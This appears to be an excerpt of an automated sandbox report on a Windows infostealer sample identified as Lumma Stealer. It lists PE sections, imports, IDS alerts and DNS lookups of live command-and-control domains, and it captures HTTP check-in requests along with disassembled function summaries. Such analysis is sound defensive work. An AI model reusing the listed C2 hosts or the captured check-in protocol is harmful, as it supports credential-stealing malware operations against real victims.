.reloc	0x1273000	0x2e78c	0x2e800	f9d35a818d66bc881388cbfb28221ed6	False	0.16918682795698925	data	5.434058652189758	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x126e1c0	0xca4	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.6393695920889988
RT_ICON	0x126ee64	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.025829875518672198
RT_ICON	0x127140c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.07129455909943715
RT_ICON	0x12724b4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.1400709219858156
RT_GROUP_ICON	0x127291c	0x3e	data	0.8064516129032258
RT_VERSION	0x127295c	0x366	data	0.4160919540229885
RT_MANIFEST	0x1272cc4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL

Import

KERNEL32.dll

AddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler

msvcrt.dll

___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcpy, memmove, memset, printf, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen

Exports

Name	Ordinal	Address
_cgo_dummy_export	1	0x141267b50

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T10:00:12.767379+0200	2056078	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop)	1	192.168.2.7	59476	1.1.1.1	53	UDP
2024-09-26T10:00:13.288579+0200	2056079	ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)	1	192.168.2.7	49704	104.21.37.97	443	TCP
2024-09-26T10:00:13.443829+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49704	104.21.37.97	443	TCP
2024-09-26T10:00:13.443829+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49704	104.21.37.97	443	TCP
2024-09-26T10:00:14.339044+0200	2056079	ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)	1	192.168.2.7	49705	104.21.37.97	443	TCP
2024-09-26T10:00:14.794278+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49705	104.21.37.97	443	TCP
2024-09-26T10:00:14.794278+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49705	104.21.37.97	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 10:00:12.792633057 CEST	49704	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:12.792669058 CEST	443	49704	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:12.792757034 CEST	49704	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:12.796319008 CEST	49704	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:12.796339989 CEST	443	49704	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:13.288496971 CEST	443	49704	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:13.288578987 CEST	49704	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:13.292030096 CEST	49704	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:13.292040110 CEST	443	49704	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:13.292427063 CEST	443	49704	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:13.332801104 CEST	49704	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:13.339515924 CEST	49704	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:13.339533091 CEST	49704	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:13.339678049 CEST	443	49704	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:13.443897963 CEST	443	49704	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:13.444001913 CEST	443	49704	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:13.444237947 CEST	49704	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:13.444252014 CEST	443	49704	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:13.448348999 CEST	443	49704	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:13.448538065 CEST	443	49704	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:13.448630095 CEST	49704	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:13.483529091 CEST	49704	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:13.483552933 CEST	443	49704	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:13.863675117 CEST	49705	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:13.863717079 CEST	443	49705	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:13.863822937 CEST	49705	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:13.870511055 CEST	49705	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:13.870527983 CEST	443	49705	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:14.338871002 CEST	443	49705	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:14.339044094 CEST	49705	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:14.340851068 CEST	49705	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:14.340861082 CEST	443	49705	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:14.341238976 CEST	443	49705	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:14.343641996 CEST	49705	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:14.343682051 CEST	49705	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:14.343759060 CEST	443	49705	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:14.794358015 CEST	443	49705	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:14.794650078 CEST	443	49705	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:14.794733047 CEST	49705	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:14.794869900 CEST	49705	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:14.794892073 CEST	443	49705	104.21.37.97	192.168.2.7
Sep 26, 2024 10:00:14.794922113 CEST	49705	443	192.168.2.7	104.21.37.97
Sep 26, 2024 10:00:14.794928074 CEST	443	49705	104.21.37.97	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 10:00:12.744628906 CEST	57119	53	192.168.2.7	1.1.1.1
Sep 26, 2024 10:00:12.754252911 CEST	53	57119	1.1.1.1	192.168.2.7
Sep 26, 2024 10:00:12.767379045 CEST	59476	53	192.168.2.7	1.1.1.1
Sep 26, 2024 10:00:12.785046101 CEST	53	59476	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 10:00:12.744628906 CEST	192.168.2.7	1.1.1.1	0xc3ad	Standard query (0)	pianoswimen.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 10:00:12.767379045 CEST	192.168.2.7	1.1.1.1	0xaf16	Standard query (0)	racedsuitreow.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 10:00:12.754252911 CEST	1.1.1.1	192.168.2.7	0xc3ad	Name error (3)	pianoswimen.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 26, 2024 10:00:12.785046101 CEST	1.1.1.1	192.168.2.7	0xaf16	No error (0)	racedsuitreow.shop		104.21.37.97	A (IP address)	IN (0x0001)	false
Sep 26, 2024 10:00:12.785046101 CEST	1.1.1.1	192.168.2.7	0xaf16	No error (0)	racedsuitreow.shop		172.67.206.221	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

racedsuitreow.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49704	104.21.37.97	443	7784	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:00:13 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: racedsuitreow.shop
2024-09-26 08:00:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 08:00:13 UTC	555	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:00:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rUpAmCRClk0MKiuYJi%2BymvKBdPj9zmmc2N0PjDLW3gxJBS9AYAH7IT97GXaAAJQ4CdtEbcMfnpfX4CujuFQ30h78%2FmTRmB5hHpK0M7u%2FAPNHTi%2BdrvUHsbh4t7UJpoMS18%2BEZxM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91b813a8211819-EWR
2024-09-26 08:00:13 UTC	814	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-26 08:00:13 UTC	1369	IN	Data Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
2024-09-26 08:00:13 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 69 55 63 4b 32 36 38 55 6d 73 6b 4a 37 42 6f 6f 54 51 52 43 66 4d 55 62 6c 73 2e 68 67 30 35 49 65 45 33 5a 38 69 5a 36 6f 62 34 2d 31 37 32 37 33 33 37 36 31 33 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e Data Ascii: <input type="hidden" name="atok" value="iUcK268UmskJ7BooTQRCfMUbls.hg05IeE3Z8iZ6ob4-1727337613-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn
2024-09-26 08:00:13 UTC	853	IN	Data Raw: 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 Data Ascii: or sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflar
2024-09-26 08:00:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49705	104.21.37.97	443	7784	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:00:14 UTC	355	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=iUcK268UmskJ7BooTQRCfMUbls.hg05IeE3Z8iZ6ob4-1727337613-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: racedsuitreow.shop
2024-09-26 08:00:14 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 72 75 69 31 31 31 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63 Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--rui111&j=5c9b8674a630d9101b46733aa37f15ec
2024-09-26 08:00:14 UTC	806	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4q38unb6hmm56ovvhjaq9829u2; expires=Mon, 20 Jan 2025 01:46:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6EowK0SmpHVqBcBfeGDxb8lPAXeoynpOWjW4J3e35NTREELKd6e37GqS2ey8Ol8xGtsQtXjol7xw0YKMIL8%2BBADJV8Sh%2FqBzT%2F%2BkSyUUTvNpI1io%2FwuvFpdzjo5NxU7ad1Embvg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91b81a2fcc42c8-EWR alt-svc: h3=":443"; ma=86400
2024-09-26 08:00:14 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 08:00:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	1
Start time:	03:59:31
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\p37SE6gM52.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\p37SE6gM52.exe"
Imagebase:	0x7ff6fc380000
File size:	19'140'096 bytes
MD5 hash:	CD68144879CF39BEFD5D96950A78370D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000001.00000000.1324374308.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000001.00000002.1728658450.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:06:03
Start date:	26/09/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Imagebase:	0x480000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	65.6%
Total number of Nodes:	128
Total number of Limit Nodes:	29

Executed Functions

Function 02B0E468 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 317
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoSetProxyBlanket.COMBASE(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02B0E487
SysFreeString.OLEAUT32(?), ref: 02B0E4A5
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02B0E4E2
SysAllocString.OLEAUT32(1D281F20), ref: 02B0E550
SysAllocString.OLEAUT32(131215E0), ref: 02B0E600
SysAllocString.OLEAUT32(131215E0), ref: 02B0E621
SysAllocString.OLEAUT32(?), ref: 02B0E698

Strings

z#u!, xrefs: 02B0E6E6
y/Y-, xrefs: 02B0E6D1
^+g), xrefs: 02B0E6D8
q?S=, xrefs: 02B0E6ED
f'G%, xrefs: 02B0E6DF

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: String$Alloc$BlanketFreeInformationProxyVolume
String ID: ^+g)$f'G%$q?S=$y/Y-$z#u!
API String ID: 1389576922-909205317
Opcode ID: 47313f61327f61a6cefbd013ee38c27fddf99e0da1de57d4dae7c8e3f7ffe4b1
Instruction ID: 7b96319de5f7b953794ac63b924ff2467cd896f72219df8d56a9d4b93f4c49e3
Opcode Fuzzy Hash: 47313f61327f61a6cefbd013ee38c27fddf99e0da1de57d4dae7c8e3f7ffe4b1
Instruction Fuzzy Hash: 8BB188B4640701DFD7258F68D884B16BBB2FF49340F648A9CE9868B791D335E861CF94

Function 02B0DEE8 Relevance: 9.4, APIs: 6, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 02B0DF63
SysStringLen.OLEAUT32(FB06F919), ref: 02B0E000
SysFreeString.OLEAUT32(?), ref: 02B0E24C
SysFreeString.OLEAUT32(?), ref: 02B0E251
SysFreeString.OLEAUT32(?), ref: 02B0E4A5
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02B0E4E2

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: String$Free$InformationInitVariantVolume
String ID:
API String ID: 3515333423-0
Opcode ID: c617079dd18bb3c3f61fd9e93292ad3a9c5a8c0ca796f3af1d01b90030001dd5
Instruction ID: 75661ef72b7119d33106b982708b6df509a58659b236f42279d03784de0c40d9
Opcode Fuzzy Hash: c617079dd18bb3c3f61fd9e93292ad3a9c5a8c0ca796f3af1d01b90030001dd5
Instruction Fuzzy Hash: 84E1CC75604701CFD7288F24D891B26BBF2FB89350F158AACE9928B7A1D735E815CB10

Function 02ADCD20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 02ADCD31
GetCurrentThreadId.KERNEL32 ref: 02ADCD46
GetCurrentProcessId.KERNEL32 ref: 02ADCD4C
ExitProcess.KERNEL32 ref: 02ADCF10

Strings

spqv, xrefs: 02ADCEAE

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: spqv
API String ID: 1029096631-2206016640
Opcode ID: f35114b8d11bacedd7e0c55cdb57253710cdeba8c384779922f51cadd3c9c36d
Instruction ID: cf360faa2d005d4b1b6be4926e53ccb8ab46c713f85e3ed271e983a54e490601
Opcode Fuzzy Hash: f35114b8d11bacedd7e0c55cdb57253710cdeba8c384779922f51cadd3c9c36d
Instruction Fuzzy Hash: BF41337084C3409BD301AF69D184A1EFBE6AF56714F949D0DE0CA9B252DB3AD810CF6B

Function 02B156C9 Relevance: 4.4, Strings: 3, Instructions: 610
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%&' , xrefs: 02B15703, 02B1570B
4`[b, xrefs: 02B15BC0
%sgh, xrefs: 02B15740

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %&' $%sgh$4`[b
API String ID: 0-2655511146
Opcode ID: 33a1b42aaf698ff89c83e1387ef5bb6127972890ed00adb490d1b96e9238c312
Instruction ID: 1a9752d1a8af9ba0898d52eaf97985e98975330c2a59c07847d9550680f0cae8
Opcode Fuzzy Hash: 33a1b42aaf698ff89c83e1387ef5bb6127972890ed00adb490d1b96e9238c312
Instruction Fuzzy Hash: 9F12CCB0E00205DFDB24CF94D891BBFBBB6FF89345FA54498D505A7281D334A958CBA1

Function 02B15510 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(02B18D50,005C003F,00000006,?,?,00000018,%&' ,?,?), ref: 02B1553E

Strings

%&' , xrefs: 02B15510, 02B1552C, 02B1553A

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: %&'
API String ID: 2994545307-1807952111
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 02B0DE76 Relevance: 3.1, APIs: 2, Instructions: 126
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(02B1CCE0,00000000,00000001,02B1CCD0,?), ref: 02B0DECA
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02B0E4E2

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: CreateInformationInstanceVolume
String ID:
API String ID: 344472464-0
Opcode ID: b4a194c9eefe91c93900bf20268622116e00de92f2f9c1dfe05727d5a027ea15
